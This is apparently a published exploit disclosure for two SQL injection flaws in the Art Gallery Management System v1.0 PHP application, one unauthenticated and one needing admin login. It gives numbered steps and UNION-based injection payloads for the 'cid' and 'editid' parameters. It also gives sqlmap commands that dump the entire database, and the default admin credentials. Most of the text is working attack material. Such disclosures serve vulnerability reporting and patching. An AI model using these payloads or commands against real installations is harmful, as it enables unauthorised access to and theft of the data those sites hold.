
<pre><code># Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (sqli) Unauthenticated<br /># Date: 20/01/2023<br /># Exploit Author: Rahul Patwari<br /># Vendor Homepage: https://phpgurukul.com/<br /># Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip<br /># Version: 1.0<br /># Tested on: XAMPP / Windows 10<br /># CVE : CVE-2023-23162<br /><br /># Proof of Concept:<br /><br /># 1- Install The application Art Gallery Management System Project v1.0<br /># 2- Navigate to the product page by clicking on the &quot;ART TYPE&quot; by selecting any of the categories on the menu.<br /># 3- Now insert a single quote ( &#39; ) on &quot;cid&quot; parameter to break the database query, you will see the output is not shown.<br /># 4- Now inject the payload double single quote (&#39;&#39;) in the &quot;cid&quot; parameter to merge the database query and after sending this request the SQL query is successfully performed and the product is shown in the output.<br /># 5- Now find how many columns are returned by the SQL query. this query will return 6 columns.<br /> Payload:cid&#61;1%27order%20by%206%20--%20-&amp;artname&#61;Sculptures<br /><br /># 6- for manually getting data from the database insert the below payload to see the user of the database.<br /> payload: cid&#61;-2%27union%20select%201,2,3,user(),5,6--%20-&amp;artname&#61;Serigraphs<br /><br /># 7- for automation using &quot;SQLMAP&quot; intercept the request and copy this request to a file called &quot;request.txt&quot;.<br /># 8- now to get all database data use the below &quot;sqlmap&quot; command to fetch all the data.<br /> Command: sqlmap -r request.txt -p cid --dump-all --batch<br /><br /># Go to this url &quot;<br />https://localhost.com/Art-Gallery-MS-PHP/product.php?cid&#61;-2%27union%20select%201,2,3,user(),5,6--%20-&amp;artname&#61;Serigraphs<br />&quot;<br /><br /><br /><br /># Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (sqli) authenticated<br /># Date: 20/01/2023<br /># Exploit Author: Rahul Patwari<br /># Vendor Homepage: https://phpgurukul.com/<br /># Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip<br /># Version: 1.0<br /># Tested on: XAMPP / Windows 10<br /># CVE : CVE-2023-23163<br /><br /># Proof of Concept:<br /><br /># 1- Install The application Art Gallery Management System Project v1.0<br /><br /># 2- Navigate to admin login page and login with the valid username and password&lt;admin:Test&#64;123&gt;.<br /> URL: http://localhost/Art-Gallery-MS-PHP/admin/login.php<br /><br /># 3- Now navigate &quot;Manage ART TYPE&quot; by clicking on &quot;ART TYPE&quot; option on left side bar.<br /><br /># 4- Now click on any of the Art Type &quot;Edit&quot; button and you will redirect to the edit page of art type.<br /><br /># 5- Now insert a single quote ( &#39; ) on &quot;editid&quot; parameter to break the database query, you will see the output is not shows.<br /><br /># 6- Now inject the payload double single quote (&#39;&#39;) in the &quot;editid&quot; parameter to merge the database query and after sending this request the SQL query is successfully performed and product is shows in the output.<br /><br /># 7- Now find how many column are returns by the SQL query. this query will return 6 column.<br /> Payload:editid&#61;6%27order%20by%203%20--%20-<br /><br /># 8- For manually get data of database insert the below payload to see the user of the database.<br /> payload: editid&#61;-6%27union%20all%20select%201,user(),3--%20-<br /><br /># 9- Now to get all database data use below &quot;sqlmap&quot; command to fetch all the data.<br /> Command: sqlmap http://localhost/Art-Gallery-MS-PHP/admin/edit-art-type-detail.php?editid&#61;6 --cookie&#61;&quot;PHPSESSID&#61;hub8pub9s5c1j18cva9594af3q&quot; --dump-all --batch<br /><br /><br /></code></pre>